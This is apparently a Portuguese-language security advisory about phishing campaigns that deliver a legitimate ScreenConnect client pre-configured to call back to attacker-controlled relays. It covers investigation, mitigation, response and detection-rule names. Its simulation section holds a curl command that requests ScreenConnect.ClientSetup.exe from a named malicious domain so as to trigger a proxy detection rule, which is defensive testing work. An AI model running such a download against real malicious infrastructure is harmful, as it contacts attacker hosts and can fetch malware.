Cliente ScreenConnect Usado Indevidamente para Habilitar Acesso Remoto Não Autorizado
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Os atacantes estão usando e-mails de phishing para distribuir um cliente ScreenConnect legítimo e pré-configurado. A ferramenta de Monitoramento e Gerenciamento Remoto (RMM) estabelece uma conexão de callback para uma instância controlada por um atacante, proporcionando acesso remoto a sistemas comprometidos. A campanha abusa da natureza confiável do software legítimo para evitar controles de segurança básicos e mecanismos de detecção.
Investigação
O investigador examinou um e-mail de phishing contendo um link que entregava um arquivo PE. A análise confirmou que o arquivo era um cliente ScreenConnect legítimo e digitalmente assinado. No entanto, sua configuração incorporada foi modificada para se conectar a uma instância de retransmissão específica e a um ID de instância controlado pelo ator da ameaça.
Mitigação
Os navegadores podem bloquear downloads de arquivos executáveis como uma camada inicial de proteção. As organizações devem monitorar o uso não autorizado de ferramentas RMM e impor controles estritos em executáveis baixados de links da web não confiáveis. A lista de permissões de aplicativos também pode ajudar a evitar que clientes ScreenConnect não autorizados e outro software RMM não aprovado sejam executados.
Resposta
Quando uma atividade maliciosa é detectada, isole o endpoint afetado para evitar que o atacante continue o acesso remoto. Identifique e termine quaisquer processos ativos do ScreenConnect. Realize uma análise forense da configuração do cliente para identificar a infraestrutura de comando e controle do atacante e determinar o alcance do acesso não autorizado ao sistema comprometido.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Software Alternativo de Acesso/ Gerenciamento Remoto (via criação de processo)
Possível Atividade de Comando e Controle por Tentativa de Comunicação de Domínio de Software de Acesso Remoto (via DNS)
Distribuição de Malware do Cliente ScreenConnect via E-mail de Phishing [Proxy HTTP]
Execução de Simulação
-
Narrativa & Comandos de Ataque: O adversário visa estabelecer persistência em uma estação de trabalho alvo distribuindo o ScreenConnect por meio de uma campanha de phishing. Nesta simulação, replicamos o estágio final: a máquina da vítima fazendo uma solicitação HTTP de saída para um domínio comprometido/malicioso para baixar o executável de configuração. Para imitar o comportamento específico identificado na inteligência de ameaça, o “atacante” utiliza uma string User-Agent personalizada
ScreenConnectao solicitar o caminho específico do arquivothelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe. Isso acionará a regra de detecção baseada em proxy. -
Script de Teste de Regressão:
# Este script usa curl para imitar a solicitação de download malicioso identificada na regra de detecção. # Ele usa o URL específico e o User-Agent específico necessário para acionar o alerta. TARGET_URL="http://thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe" MALICIOUS_UA="ScreenConnect" echo "[*] Simulando tentativa de download do ScreenConnect..." echo "[*] URL: $TARGET_URL" echo "[*] User-Agent: $MALICIOUS_UA" # Usamos -k para ignorar erros de SSL se o domínio simulado utilizar um certificado autoassinado, # e -A para configurar o User-Agent específico. curl -k -A "$MALICIOUS_UA" "$TARGET_URL" -o /dev/null echo "[*] Comando de simulação enviado." -
Comandos de Limpeza:
# Nenhum arquivo foi realmente baixado para o host na simulação (redirecionado para /dev/null). # Nenhuma alteração no sistema foi feita. echo "[*] Limpeza completa. Nenhum vestígio deixado no host."